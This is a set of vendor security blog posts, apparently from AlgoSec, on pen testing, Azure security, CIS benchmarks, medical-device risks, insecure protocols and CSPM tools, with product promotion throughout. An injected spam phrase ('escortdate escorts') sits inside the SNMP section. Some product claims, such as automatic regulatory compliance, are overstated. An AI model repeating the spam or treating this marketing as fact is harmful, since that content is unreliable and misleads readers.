the company, except the person who hires the outside professional, knows that the test is taking place. External pen test – This method is used to test external security. Internal pen test – This method is used to test the internal network. The Prevasio Solution Prevasio’s solution is geared towards increasing the effectiveness of red teams for organizations that have taken steps to containerize their applications and now rely on docker containers to ship their applications to production. The benefits of Prevasio’s solution to red teams include: Auto penetration testing that helps teams conduct break-and-attack simulations on company applications. It can also be used as an integrated feature inside the CI/CD to provide reachability assurance. The behavior analysis will allow teams to identify unintentional internal oversights of best practices. The solution features the ability to intercept and scan encrypted HTTPS traffic. This helps teams determine if any credentials should not be transmitted. Prevasio container security solution with its cutting-edge analyzer performs both static and dynamic analysis of the containers during runtime to ensure the safest design possible. Moving Forward Cyberattacks are as real of a threat to your organization’s network and systems as physical attacks from burglars and robbers. They can have devastating consequences for your company and your brand. The bottom line is that you always have to be one step ahead of cyberattackers and ready to take action, should a breach be detected. The best way to do this is to work through real-world simulations and exercises that prepare your IT department for the worst and give them practice on how to respond. After all, it is better for your team (or a hired ethical hacker) to find a vulnerability before a real hacker does. Simulations should be conducted regularly since the technology and methods used to hack are constantly changing. The result is a highly trained team and a network that is as secure as it can be. Prevasio is an effective solution in conducting breach and attack simulations that help red/blue teams and pen testing teams do their jobs better in Docker containers. Our team is just as dedicated to the security of your organization as you are. Click here to learn more start your free trial. Schedule a demo Related Articles Q1 at AlgoSec: What innovations and milestones defined our start to 2026? AlgoSec Reviews Mar 19, 2023 · 2 min read 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

Azure Security Best Practices: Don't Get Caught with Your Cloud Pants Down Executive Summary The cloud isn't some futuristic fantasy... Cloud Security Azure Security Best Practices Asher Benbenisty 2 min read Asher Benbenisty Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 11/25/24 Published Azure Security Best Practices: Don't Get Caught with Your Cloud Pants Down Executive Summary The cloud isn't some futuristic fantasy anymore, folks. It's the backbone of modern business, and Azure is charging hard, fueled by AI, to potentially dethrone AWS by 2026. But with this breakneck adoption comes a harsh reality: security can't be an afterthought. This article dives deep into why robust security practices are non-negotiable in Azure and how tools like Microsoft Sentinel and Defender XDR can be your digital bodyguards. Introduction Let's face it, organizations are flocking to the cloud like moths to a digital flame. Why? Cost savings, streamlined operations, and the ability to scale at warp speed. We're talking serious money here – a projected $805 billion spent on public cloud services in 2024! The cloud's not just disrupting the game; it is the game. And the playing field is shifting. AWS might be the king of the hill right now, but Azure's hot on its heels, thanks to some serious AI muscle. ( As of 2024, they hold market shares of 31%, 24%, and 11%, respectively .) Forbes even predicts an Azure takeover by 2026. Exciting times, right? Hold your horses. This rapid cloud adoption has a dark side. Security threats are lurking around every corner, and sticking to best practices is more crucial than ever. Cloud service managers, listen up: you need to wrap your heads around the shared responsibility model (Figure 1). Think of it like this: you and Azure are partners in crime prevention. You're both responsible for keeping your digital assets safe, but you need to know who's holding which piece of the security puzzle. Don't assume security is built-in – it's a team effort, and you need to pull your weight. Figure 1: The shared responsibility model Azure's Security Architecture: A Fortress in the Cloud Okay, I get it. The shared responsibility model can feel like navigating a maze blindfolded. But here's the deal: whether you're dabbling in IaaS, PaaS, or SaaS, Azure's got your infrastructure covered. Their global network of data centers is built like Fort Knox, meeting industry standards like ISO/IEC 27001:2022 , HIPAA , and NIST SP 800-53 . But remember your part of the bargain! Azure provides a killer arsenal of security products to protect your workloads, both in Azure and beyond. Figure 2: Azure’s security architecture Take Microsoft Sentinel, for example. This superhero of a tool automatically sniffs out threats, investigates them, and neutralizes them before they can wreak havoc. It's like having a 24/7 security team with superhuman senses. And don't forget about Microsoft Defender XDR. This comprehensive security suite is like a digital Swiss Army knife, protecting your identities, endpoints, applications, email, and cloud apps. It's got your back, no matter where you turn. With Sentinel and Defender XDR in your corner, you're well-equipped to tackle the security challenges that come with cloud adoption. But don't get complacent! Let's dive into some core security best practices that will make your Azure environment an impenetrable fortress. Core Security Best Practices: Lock Down Your Secrets Protecting Secrets: Best Practices Using Azure Key Vault We all have secrets, right? In the digital world, those secrets are things like passwords, API keys, and encryption keys. You can't just leave them lying around for any cybercriminal to snatch. That's where Azure Key Vault comes in. This secure vault is like a digital safe deposit box for your sensitive data. It uses hardware security modules (HSMs) to keep your secrets locked down tight, even if someone manages to breach your defenses. Big names like Victoria's Secret & Co , Evup, and Sage trust Key Vault to keep their secrets safe. Figure 3: A new Key Vault named “algosec-kv” Here's a pro tip: once you've stashed your secrets in Key Vault, use a managed identity to access them. This eliminates the need to hardcode credentials in your code, minimizing the risk of exposure. var client = new SecretClient(new Uri("https://. vault.azure.net/ "), new DefaultAzureCredential(),options); KeyVaultSecret secret = client.GetSecret(""); string secretValue = secret.Value; Key Vault is a fantastic tool, but it's not a silver bullet. Download our checklist of additional best practices to keep your secrets safe: Database and Data Security: More Than Just Locking the Door Azure offers a smorgasbord of data storage solutions, from Azure SQL Database to Azure Blob Storage. But securing your data isn't just about protecting it at rest. You need to think about data in use and data in transit, too. Download our checklist for a full action plan: Identity Management: Who Are You, and What Are You Doing Here? Encryption is great, but it's only half the battle. You need to know who's accessing your resources and what they're doing. That's where identity access management (IAM) comes in. Think of IAM as a digital bouncer, controlling access to your network resources. It's all about verifying identities and granting the right level of access – no more, no less. Zero-trust network access (ZTNA) is your secret weapon here. It's like having a security checkpoint at every corner of your network, ensuring that only authorized users can access your resources. Figure 4: Zero-trust security architecture Remember the Capital One breach? A misconfigured firewall and overly broad permissions led to a massive data leak. Don't let that be you! Follow Azure's IAM documentation to build a robust and secure identity management system. Network Security: Building a Digital Moat Your network architecture is the foundation of your security posture. Choose wisely, my friends! The hub-spoke model is a popular choice in Azure, centralizing common services in a secure hub and isolating workloads in separate spokes. Figure 5: Hub-spoke network architecture in Azure (Source: Azure documentation ) For a checklist of how the hub-spoke model can boosts your security, download our checklist here. Digital Realty , a real estate investment giant, uses the hub-spoke model to secure its global portal and REST APIs. It's a testament to the power of this architecture for both security and performance. Figure 6: Digital Realty’s use of hub-spoke architecture (Adapted from Microsoft Customer Stories ) Operational Security: Stay Vigilant, Stay Secure (Continued) When a security incident strikes, your response time is critical. Think of operational security as your digital first aid kit. It's about minimizing human error and automating processes to speed up threat detection and response. We've already talked about MFA, password management, and the dynamic duo of Defender XDR and Sentinel. Download our checklist for a few more operational security essentials to add to your arsenal. Figure 7: Build-deploy workflow automation (Source: Azure documentation ) Think of these best practices as guardrails, guiding you toward secure decisions. But remember, flexibility is key. Adapt these practices to your specific environment and architecture. Conclusion As Azure's popularity skyrockets, so do the stakes. The shared responsibility model means you're not off the hook when it comes to security. Azure provides powerful tools like Sentinel and Defender XDR, but it's up to you to use them wisely and follow best practices. Protect your secrets like they're buried treasure, secure your data with Fort Knox-level encryption, implement identity management that would make a border patrol agent proud, and build a network architecture that's a digital fortress. And don't forget about operational security – it's the glue that holds it all together. But let's be real, managing security policies across multiple clouds can be a nightmare. That's where tools like AlgoSec CloudFlow come in. They provide a clear view of your security landscape, helping you identify vulnerabilities and streamline policy management. It's like having a security command center for your entire cloud infrastructure. So, what are you waiting for? Request a demo today and let AlgoSec help you build an Azure environment that's so secure, even the most determined cybercriminals will be left scratching their heads. Schedule a demo Related Articles Q1 at AlgoSec: What innovations and milestones defined our start to 2026? AlgoSec Reviews Mar 19, 2023 · 2 min read 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

CIS provides best practices to help companies like yours improve their cloud security posture. You’ll protect your systems against... Cloud Security What is CIS Compliance? (and How to Apply CIS Benchmarks) Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 6/20/23 Published CIS provides best practices to help companies like yours improve their cloud security posture. You’ll protect your systems against various threats by complying with its benchmark standards. This post will walk you through CIS benchmarks, their development, and the kinds of systems they apply to. We will also discuss the significance of CIS compliance and how Prevasio may help you achieve it. What are CIS benchmarks? CIS stands for Center for Internet Security . It’s a nonprofit organization that aims to improve companies’ cybersecurity readiness and response. Founded in 2000, the CIS comprises cybersecurity experts from diverse backgrounds. They have the common goal of enhancing cybersecurity resilience and reducing security threats. CIS compliance means adhering to the Center for Internet Security (CIS) benchmarks. CIS benchmarks are best practices and guidelines to help you build a robust cloud security strategy. These CIS benchmarks give a detailed road map for protecting a business’s IT infrastructure. They also encompass various platforms, such as web servers or cloud bases. The CIS benchmarks are frequently called industry standards. They are normally in line with other regulatory organizations, such as ISO, NIST, and HIPAA. Many firms adhere to CIS benchmarks to ensure they follow industry standards. They also do this to show their dedication to cybersecurity to clients and stakeholders. The CIS benchmarks and CIS controls are always tested through on-premises analysis by leading security firms. This ensures that CIS releases standards that are effective at mitigating cyber risks. How are the CIS benchmarks developed? A community of cybersecurity professionals around the world cooperatively develops CIS benchmarks. They exchange their knowledge, viewpoints, and experiences on a platform provided by CIS. The end result is consensus-based best practices that will protect various IT systems. The CIS benchmark development process typically involves the following steps: 1. Identify the technology: The first step is to identify the system or technology that has to be protected. This encompasses a range of applications. It can be an operating system, database, web server, or cloud environment. 2. Define the scope: The following stage is to specify the benchmark’s parameters. It involves defining what must be implemented for the technology to be successfully protected. They may include precise setups, guidelines, and safeguards. 3. Develop recommendations: Next, a community of cybersecurity experts will identify ideas for safeguarding the technology. These ideas are usually based on current best practices, norms, and guidelines. They may include the minimum security requirements and measures to be taken. 4. Expert consensus review: Thereafter, a broader group of experts and stakeholders assess the ideas. They will offer comments and suggestions for improvement. This level aims to achieve consensus on the appropriate technical safeguards. 5. Pilot testing: The benchmark is then tested in a real-world setting. At this point, CIS aims to determine its efficacy and spot any problems that need fixing. 6. Publication and maintenance: The CIS will publish the benchmark once it has been improved and verified. The benchmark will constantly be evaluated and updated to keep it current and useful for safeguarding IT systems. What are the CIS benchmark levels? CIS benchmarks are divided into three levels based on the complexity of an IT system. It’s up to you to choose the level you need based on the complexity of your IT environment. Each level of the benchmarks offers better security recommendations than the previous level. The following are the distinct categories that benchmarks are divided into: Level 1 This is the most basic level of CIS standards. It requires organizations to set basic security measures to reduce cyber threats. Some CIS guidelines at this level include password rules, system hardening, and risk management. The level 1 CIS benchmarks are ideal for small businesses with basic IT systems. Level 2 This is the intermediate level of the CIS benchmarks. It is suitable for small to medium businesses that have complex IT systems. The Level 2 CIS standards offer greater security recommendations to your cloud platform. It has guidelines for network segmentation, authentication, user permissions, logging, and monitoring. At this level, you’ll know where to focus your remediation efforts if you spot a vulnerability in your system. Level 2 also covers data protection topics like disaster recovery plans and encryption. Level 3 Level 3 is the most advanced level of the CIS benchmarks. It offers the highest security recommendations compared to the other two. Level 3 also offers the Security Technical Implementation Guide (STIG) profiles for companies. STIG are configuration guidelines developed by the Defense Information Systems Agency. These security standards help you meet US government requirements. This level is ideal for large organizations with the most sensitive and vital data. These are companies that must protect their IT systems from complex security threats. It offers guidelines for real-time security analytics, safe cloud environment setups, and enhanced threat detection. What types of systems do CIS benchmarks apply to? The CIS benchmarks are applicable to many IT systems used in a cloud environment. The following are examples of systems that CIS benchmarks can apply to: Operating systems: CIS benchmarks offer standard secure configurations for common operating systems, including Amazon Linux, Windows Servers, macOS, and Unix. They address network security, system hardening, and managing users and accounts. Cloud infrastructure: CIS benchmarks can help protect various cloud infrastructures, including public, private, and multi-cloud. They recommend guidelines that safeguard cloud systems by various cloud service providers. For example, network security, access restrictions, and data protection. The benchmarks cover cloud systems such as Amazon Web Services (AWS), Microsoft Azure, IBM, Oracle, and Google Cloud Platform. Server software: CIS benchmarks provide secure configuration baselines for various servers, including databases (SQL), DNS, Web, and authentication servers. The baselines cover system hardening, patch management, and access restrictions. Desktop software: Desktop apps such as music players, productivity programs, and web browsers can be weak points in your IT system. CIS benchmarks offer guidelines to help you protect your desktop software from vulnerabilities. They may include patch management, user and account management, and program setup. Mobile devices: The CIS benchmarks recommend safeguarding endpoints such as tablets and mobile devices. The standards include measures for data protection, account administration, and device configuration. Network devices: CIS benchmarks also involve network hardware, including switches, routers, and firewalls. Some standards for network devices include access restrictions, network segmentation, logging, and monitoring. Print devices: CIS benchmarks also cover print devices like printers and scanners. The CIS benchmark baselines include access restrictions, data protection, and firmware upgrades. Why is CIS compliance important? CIS compliance helps you maintain secure IT systems. It does this by helping you adhere to globally recognized cybersecurity standards. CIS benchmarks cover various IT systems and product categories, such as cloud infrastructures. So by ensuring CIS benchmark compliance, you reduce the risk of cyber threats to your IT systems. Achieving CIS compliance has several benefits: 1. Your business will meet internationally accepted cybersecurity standards . The CIS standards are developed through a consensus review process. This means they are founded on the most recent threat intelligence and best practices. So you can rely on the standards to build a solid foundation for securing your IT infrastructure. 2. It can help you meet regulatory compliance requirements for other important cybersecurity frameworks . CIS standards can help you prove that you comply with other industry regulations. This is especially true for companies that handle sensitive data or work in regulated sectors. CIS compliance is closely related to other regulatory compliances such as NIST, HIPAA, and PCI DSS. By implementing the CIS standards, you’ll conform to the applicable industry regulations. 3. Achieving CIS continuous compliance can help you lower your exposure to cybersecurity risks . In the process, safeguard your vital data and systems. This aids in preventing data breaches, malware infections, and other cyberattacks. Such incidents could seriously harm your company’s operations, image, and financial situation. A great example is the Scottish Oil giant, SSE. It had to pay €10M in penalties for failing to comply with a CIS standard in 2013. 4. Abiding by the security measures set by CIS guidelines can help you achieve your goals faster as a business. The guidelines cover the most important and frequently attacked areas of IT infrastructure. 5. CIS compliance enhances your general security posture. It also decreases the time and resources needed to maintain security. It does this by providing uniform security procedures across various platforms. How to achieve CIS compliance? Your organization can achieve CIS compliance by conforming to the guidelines of the CIS benchmarks and CIS controls. Each CIS benchmark usually includes a description of a recommended configuration. It also usually contains a justification for the implementation of the configuration. Finally, it offers step-by-step instructions on how to carry out the recommendation manually. While the standards may seem easy to implement manually, they may consume your time and increase the chances of human errors. That is why most security teams prefer using tools to automate achieving and maintaining CIS compliance. CIS hardened images are great examples of CIS compliance automation tools. They are pre-configured images that contain all the necessary recommendations from CIS benchmarks. You can be assured of maintaining compliance by using these CIS hardened images in your cloud environment. You can also use CSPM tools to automate achieving and maintaining CIS compliance. Cloud Security Posture Management tools automatically scan for vulnerabilities in your cloud. They then offer detailed instructions on how to fix those issues effectively. This way, your administrators don’t have to go through the pain of doing manual compliance checks. You save time and effort by working with a CSPM tool. Use Prevasio to monitor CIS compliance. Prevasio is a cloud-native application platform (CNAPP) that can help you achieve and maintain CIS compliance in various setups, including Azure, AWS, and GCP. A CNAPP is basically a CSPM tool on steroids. It combines the features of CSPM, CIEM, IAM, and CWPP tools into one solution. This means you’ll get clearer visibility of your cloud environment from one platform. Prevasio constantly assesses your system against the latest version of CIS benchmarks. It then generates reports showing areas that need adjustments to keep your cloud security cyber threat-proof. This saves you time as you won’t have to do the compliance checks manually. Prevasio also has a robust set of features to help you comply with standards from other regulatory bodies. So using this CSPM tool, you’ll automatically comply with HIPAA, PCI DSS, and GDPR. Prevasio offers strong vulnerability evaluation and management capabilities besides CIS compliance monitoring. It uses cutting-edge scanning algorithms to find known flaws, incorrect setups, and other security problems in IT settings. This can help you identify and fix vulnerabilities before fraudsters can exploit them. The bottom line on CIS compliance Achieving and maintaining CIS compliance is essential in today’s continually changing threat landscape . However, doing the compliance checks manually takes time. You may not also spot weaknesses in your cloud security in time. This means that you need to automate your CIS compliance. And what better solution than a cloud security posture management tool like Prevasio? Prevasio is the ideal option for observing compliance and preventing malware that attack surfaces in cloud assets. Prevasio offers a robust security platform to help you achieve CIS compliance and maintain a secure IT environment. This platform is agentless, meaning it doesn’t run on the cloud like most of its competitors. So you save a lot in costs every time Prevasio runs a scan. Prevaiso also conducts layer analysis. It helps you spot the exact line of code where the problem is rather than give a general area. In the process, saving you time spent identifying and solving critical threats. Try Prevasio today! Schedule a demo Related Articles Q1 at AlgoSec: What innovations and milestones defined our start to 2026? AlgoSec Reviews Mar 19, 2023 · 2 min read 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

Hospitals are increasingly becoming a favored target of cyber criminals. Yet if you think about medical equipment that is vulnerable to... Cyber Attacks & Incident Response Checking the cybersecurity pulse of medical devices Prof. Avishai Wool 2 min read Prof. Avishai Wool Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 6/14/16 Published Hospitals are increasingly becoming a favored target of cyber criminals. Yet if you think about medical equipment that is vulnerable to being hacked at a hospital, you might not immediately think of high-end, critical equipment such as MRI and X-ray scanners, and nuclear medicine devices. After all, these devices go through rigorous approval processes by the US Food & Drug Administration (FDA) before they are approved for safe use on patients. Yet today many, if not most, medical devices, have computers embedded in them, are connected to the hospital network, and often to the internet as well, so they provide a potential attack vector for cyber criminals. In late 2015 security researchers found that thousands of medical devices were vulnerable to attack and exposed to the public Internet. Interestingly, these researchers also found that many of the devices in question were running Windows XP – which is no longer supported or updated by Microsoft – and did not run antivirus software to protect them against malware. This combination raises an obvious security red flag. Ironically, these security vulnerabilities were further exacerbated because of the very FDA approvals process that certifies the devices. The approval process is, quite rightly, extremely rigorous. It is also lengthy and expensive. And if a manufacturer or vendor makes a change to a device, it needed to be re-certified. Until very recently, a ‘change’ to a medical device meant any sort of change – including patching devices’ operating systems and firmware to close off potential network security vulnerabilities. You can see where this is going: making simple updates to medical equipment to improve its defenses against cyberattacks was made that much more difficult and complex for the device manufacturers, because of the need for FDA re-certification every time a change was made. And of course, this potential delay in patching vulnerabilities made it easy for a hacker to try and ‘update’ the device in his own way, for criminal purposes. Hackers are usually not too concerned about getting FDA approval for their work. Fortunately, the FDA released new guidelines last year that allowed equipment manufacturers to patch software as required without undergoing re-certification—provided the change or modification does not ‘significantly affect the safety or effectiveness of the medical device’. That’s good news – but it’s not quite the end of the story. The FDA’s guidelines are only a partial panacea to the overall problem. They overlook the fact that many medical devices are running obsolete operating systems like Windows XP. What’s more, the actual process of applying patches to the computers in medical devices can vary enormously from manufacturer to manufacturer, with some patches needing to be downloaded and applied manually, while others may be pushed automatically. In either case, there could still be a window of weeks, months or even years before the device’s vendor issues a patch for a given vulnerability – a window that a hacker could exploit before the hospital’s IT team becomes aware that the vulnerability exists. This means that hospitals need to take great care when it comes to structuring and segmenting their network . It is vital that connected medical devices – particularly those where the internal OS may be out of date – are placed within defined, segregated segments of the network, and robustly protected with next-generation firewalls, web proxies and other filters. While network segmentation and filtering will not protect unpatched or obsolete operating system, they will ensure that the hospital’s network is secured to the best of its ability . Schedule a demo Related Articles Q1 at AlgoSec: What innovations and milestones defined our start to 2026? AlgoSec Reviews Mar 19, 2023 · 2 min read 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

Insecure Service Protocols and Ports Okay, we all have them… they’re everyone’s dirty little network security secrets that we try not to... Risk Management and Vulnerabilities Removing insecure protocols In networks Matthew Pascucci 2 min read Matthew Pascucci Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 7/15/14 Published Insecure Service Protocols and Ports Okay, we all have them… they’re everyone’s dirty little network security secrets that we try not to talk about. They’re the protocols that we don’t mention in a security audit or to other people in the industry for fear that we’ll be publicly embarrassed. Yes, I’m talking about cleartext protocols which are running rampant across many networks. They’re in place because they work, and they work well, so no one has had a reason to upgrade them. Why upgrade something if it’s working right? Wrong. These protocols need to go the way of records, 8-tracks and cassettes (many of these protocols were fittingly developed during the same era). You’re putting your business and data at serious risk by running these insecure protocols. There are many insecure protocols that are exposing your data in cleartext, but let’s focus on the three most widely used ones: FTP, Telnet and SNMP. FTP (File Transfer Protocol) This is by far the most popular of the insecure protocols in use today. It’s the king of all cleartext protocols and one that needs to be smitten from your network before it’s too late. The problem with FTP is that all authentication is done in cleartext which leaves little room for the security of your data. To put things into perspective, FTP was first released in 1971, almost 45 years ago. In 1971 the price of gas was 40 cents a gallon, Disneyland had just opened and a company called FedEx was established. People, this was a long time ago. You need to migrate from FTP and start using an updated and more secure method for file transfers, such as HTTPS, SFTP or FTPS. These three protocols use encryption on the wire and during authentication to secure the transfer of files and login. Telnet If FTP is the king of all insecure file transfer protocols then telnet is supreme ruler of all cleartext network terminal protocols. Just like FTP, telnet was one of the first protocols that allowed you to remotely administer equipment. It became the defacto standard until it was discovered that it passes authentication using cleartext. At this point you need to hunt down all equipment that is still running telnet and replace it with SSH, which uses encryption to protect authentication and data transfer. This shouldn’t be a huge change unless your gear cannot support SSH. Many appliances or networking gear running telnet will either need the service enabled or the OS upgraded. If both of these options are not appropriate, you need to get new equipment, case closed. I know money is an issue at times, but if you’re running a 45 year old protocol on your network with the inability to update it, you need to rethink your priorities. The last thing you want is an attacker gaining control of your network via telnet. Its game over at this point. SNMP (Simple Network Management Protocol) This is one of those sneaky protocols that you don’t think is going to rear its ugly head and bite you, but it can! escortdate escorts . There are multiple versions of SNMP, and you need to be particularly careful with versions 1 and 2. For those not familiar with SNMP, it’s a protocol that enables the management and monitoring of remote systems. Once again, the strings can be sent via cleartext, and if you have access to these credentials you can connect to the system and start gaining a foothold on the network, including managing, applying new configurations or gaining in-depth monitoring details of the network. In short, it a great help for attackers if they can get hold of these credentials. Luckily version 3.0 of SNMP has enhanced security that protects you from these types of attacks. So you must review your network and make sure that SNMP v1 and v2 are not being used. These are just three of the more popular but insecure protocols that are still in heavy use across many networks today. By performing an audit of your firewalls and systems to identify these protocols, preferably using an automated tool such as AlgoSec Firewall Analyzer , you should be able to pretty quickly create a list of these protocols in use across your network. It’s also important to proactively analyze every change to your firewall policy (again preferably with an automated tool for security change management ) to make sure no one introduces insecure protocol access without proper visibility and approval. Finally, don’t feel bad telling a vendor or client that you won’t send data using these protocols. If they’re making you use them, there’s a good chance that there are other security issues going on in their network that you should be concerned about. It’s time to get rid of these protocols. They’ve had their usefulness, but the time has come for them to be sunset for good. Schedule a demo Related Articles Q1 at AlgoSec: What innovations and milestones defined our start to 2026? AlgoSec Reviews Mar 19, 2023 · 2 min read 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

Cloud-native organizations need an efficient and automated way to identify the security risks across their cloud infrastructure. Sergei... Cloud Security CSPM essentials – what you need to know? Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 11/24/22 Published Cloud-native organizations need an efficient and automated way to identify the security risks across their cloud infrastructure. Sergei Shevchenko, Prevasio’s Co-Founder & CTO breaks down the essence of a CSPM and explains how CSPM platforms enable organizations to improve their cloud security posture and prevent future attacks on their cloud workloads and applications. In 2019, Gartner recommended that enterprise security and risk management leaders should invest in CSPM tools to “proactively and reactively identify and remediate these risks”. By “these”, Gartner meant the risks of successful cyberattacks and data breaches due to “misconfiguration, mismanagement, and mistakes” in the cloud. So how can you detect these intruders now and prevent them from entering your cloud environment in future? Cloud Security Posture Management is one highly effective way but is often misunderstood. Cloud Security: A real-world analogy There are many solid reasons for organizations to move to the cloud. Migrating from a legacy, on-premises infrastructure to a cloud-native infrastructure can lower IT costs and help make teams more agile. Moreover, cloud environments are more flexible and scalable than on-prem environments, which helps to enhance business resilience and prepares the organization for long-term opportunities and challenges. That said, if your production environment is in the cloud, it is also prone to misconfiguration errors, which opens the firm to all kinds of security threats and risks. Think of this environment as a building whose physical security is your chief concern. If there are gaps in this security, for example, a window that doesn’t close all the way or a lock that doesn’t work properly, you will try to fix them on priority in order to prevent unauthorized or malicious actors from accessing the building. But since this building is in the cloud, many older security mechanisms will not work for you. Thus, simply covering a hypothetical window or installing an additional hypothetical lock cannot guarantee that an intruder won’t ever enter your cloud environment. This intruder, who may be a competitor, enemy spy agency, hacktivist, or anyone with nefarious intentions, may try to access your business-critical services or sensitive data. They may also try to persist inside your environment for weeks or months in order to maintain access to your cloud systems or applications. Old-fashioned security measures cannot keep these bad guys out. They also cannot prevent malicious outsiders or worse, insiders from cryptojacking your cloud resources and causing performance problems in your production environment. What a CSPM is The main purpose of a CSPM is to help organizations minimize risk by providing cloud security automation, ensuring multi-cloud environments remain secure as they grow in scale and complexity. But, as organizations reach scale and add more complexity to their multi- cloud cloud environment, how can CSPMs help companies minimize such risks and better protect their cloud environments? Think of a CSPM as a building inspector who visits the building regularly (say, every day, or several times a day) to inspect its doors, windows, and locks. He may also identify weaknesses in these elements and produce a report detailing the gaps. The best, most experienced inspectors will also provide recommendations on how you can resolve these security issues in the fastest possible time. Similar to the role of a building inspector, CSPM provides organizations with the tools they need to secure your multi-cloud environment efficiently in a way that scales more readily than manual processes as your cloud deployments grow. Here are some CSPM key benefits: Efficient early detection: A CSPM tool allows you to automatically and continuously monitor your cloud environment. It will scan your cloud production environment to detect misconfiguration errors, raise alerts, and even predict where these errors may appear next. Responsive risk remediation: With a CSPM in your cloud security stack, you can also automatically remediate security risks and hidden threats, thus shortening remediation timelines and protecting your cloud environment from threat actors. Consistent compliance monitoring: CSPMs also support automated compliance monitoring, meaning they continuously review your environment for adherence to compliance policies. If they detect drift (non-compliance), appropriate corrective actions will be initiated automatically. What a CSPM is not Using the inspector analogy, it’s important to keep in mind that a CSPM can only act as an observer, not a doer. Thus, it will only assess the building’s security environment and call out its weakness. It won’t actually make any changes himself, say, by doing intrusive testing. Even so, a CSPM can help you prevent 80% of misconfiguration-related intrusions into your cloud environment. What about the remaining 20%? For this, you need a CSPM that offers something container scanning. Why you need an agentless CSPM across your multi-cloud environment If your network is spread over a multi-cloud environment, an agentless CSPM solution should be your optimal solution. Here are three main reasons in support of this claim: 1. Closing misconfiguration gaps: It is especially applicable if you’re looking to eliminate misconfigurations across all your cloud accounts, services, and assets. 2. Ensuring continuous compliance: It also detects compliance problems related to three important standards: HIPAA, PCI DSS, and CIS. All three are strict standards with very specific requirements for security and data privacy. In addition, it can detect compliance drift from the perspectives of all three standards, thus giving you the peace of mind that your multi-cloud environment remains consistently compliant. 3. Comprehensive container scanning: An agentless CSPM can scan container environments to uncover hidden backdoors. Through dynamic behavior analyses, it can detect new threats and supply chain attack risks in cloud containers. It also performs container security static analyses to detect vulnerabilities and malware, thus providing a deep cloud scan – that too in just a few minutes. Why Prevasio is your ultimate agentless CSPM solution Multipurpose: Prevasio combines the power of a traditional CSPM with regular vulnerability assessments and anti-malware scans for your cloud environment and containers. It also provides a prioritized risk list according to CIS benchmarks, so you can focus on the most critical risks and act quickly to adequately protect your most valuable cloud assets. User friendly: Prevasio’s CSPM is easy to use and easier still to set up. You can connect your AWS account to Prevasio in just 7 mouse clicks and 30 seconds. Then start scanning your cloud environment immediately to uncover misconfigurations, vulnerabilities, or malware. Built for scale: Prevasio’s CSPM is the only solution that can scan cloud containers and provide more comprehensive cloud security configuration management with vulnerability and malware scans. Schedule a demo Related Articles Q1 at AlgoSec: What innovations and milestones defined our start to 2026? AlgoSec Reviews Mar 19, 2023 · 2 min read 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call